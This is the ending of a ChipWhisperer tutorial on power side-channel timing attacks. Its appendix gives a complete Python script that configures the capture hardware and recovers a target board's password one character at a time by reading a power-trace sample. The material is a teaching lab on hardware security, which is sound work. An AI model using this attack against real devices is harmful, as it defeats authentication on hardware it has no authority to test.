This tutorial has demonstrated the use of the power side-channel for performing timing attacks. A target with a simple password-based security system is broken. In addition you have learned about the scripting support in the ChipWhisperer-Capture software.
= Appendix: Completed Timing Attack Script =
The <code>run()</code> function at the end of the tutorial might look something like the following:
<pre>
def run(self):
# This is the function that gets called when our script starts
# First: set up the basics and connect to the CW-Lite
self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC'])
self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial'])
self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native'])
self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite'])
self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite'])
self.api.connect()
# Next: set up everything we need to connect to the target
# Put all of our commands in a list and execute them at the end
lstexample = [
# Gain
['OpenADC', 'Gain Setting', 'Setting', 45],
# Trigger
['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
['OpenADC', 'Trigger Setup', 'Offset', 0],
['OpenADC', 'Trigger Setup', 'Total Samples', 2000],
# Clock
['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
# Pins
['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
# Automatic commands
['Simple Serial', 'Load Key Command', ''],
['Simple Serial', 'Go Command', 'h0px3\n'],
['Simple Serial', 'Output Format', ''],
# Auto-reset
['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
['Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
]
#Download all hardware setup parameters
for cmd in lstexample:
self.api.setParameter(cmd)
# Get one capture for fun
self.api.capture1()
data = self.api.getScope().datapoints
print data
# Crack the first letter
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
for i in range(5):
for c in trylist:
# Get a power trace using our next attempt
nextPass = password + '{}'.format(c)
self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
self.api.capture1()
# Grab the trace
nextTrace = self.api.getScope().datapoints
# Check location 153, 225, etc. If it's too low, we've failed
if nextTrace[153 + 72*i] < -0.2:
continue
# If we got here, we've found the right letter
password += c
print '{} characters: {}'.format(i+1, password)
break
</pre>
[[Category:Tutorials]]